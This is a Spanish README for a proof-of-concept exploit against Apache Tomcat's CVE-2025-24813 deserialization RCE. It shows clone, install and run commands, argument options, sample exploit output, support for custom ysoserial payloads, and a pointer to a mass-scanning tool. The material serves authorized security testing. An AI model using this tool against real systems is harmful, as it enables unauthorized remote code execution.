
Un exploit de prueba de concepto en Python para CVE-2025-24813 - RCE no autenticado en Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2) mediante deserialización de objetos Java maliciosos. Incluye modo de detección seguro y soporte de payloads personalizados.
Una prueba de concepto de exploit para la vulnerabilidad de deserialización en Apache Tomcat (CVE-2025-24813). Esta herramienta demuestra cómo los atacantes podrían explotar la deserialización insegura en la gestión de sesiones de Tomcat.
ADVERTENCIA: Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El uso no autorizado contra sistemas que no te pertenecen es ilegal.
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
Uso básico:
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
Opciones avanzadas:
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| Argumento | Descripción | Requerido |
|---|---|---|
-t, --target | Dirección IP del objetivo | Sí |
-p, --port | Número de puerto del objetivo | Sí |
--protocol | http o https (por defecto: http) | No |
--no-verify | Deshabilitar la verificación del certificado SSL | No |
--timeout | Tiempo de espera de la solicitud en segundos (por defecto: 10) | No |
[*] Apache Tomcat CVE-2025-24813 Exploit PoC
[!] WARNING: For authorized testing only. Unauthorized use is illegal.
[*] Targeting http://192.168.1.100:8080
[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.
[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
Para escaneo masivo de sistemas vulnerables:
🔍 CVE-2025-24813-Scanner - Herramienta de detección masiva para hosts Tomcat vulnerables
Si estás afectado por esta vulnerabilidad:
Este software se proporciona bajo la Licencia MIT. El autor no es responsable del mal uso de esta herramienta. Siempre obtén la autorización adecuada antes de probar sistemas.
Licencia MIT: consulta el archivo LICENSE para más detalles.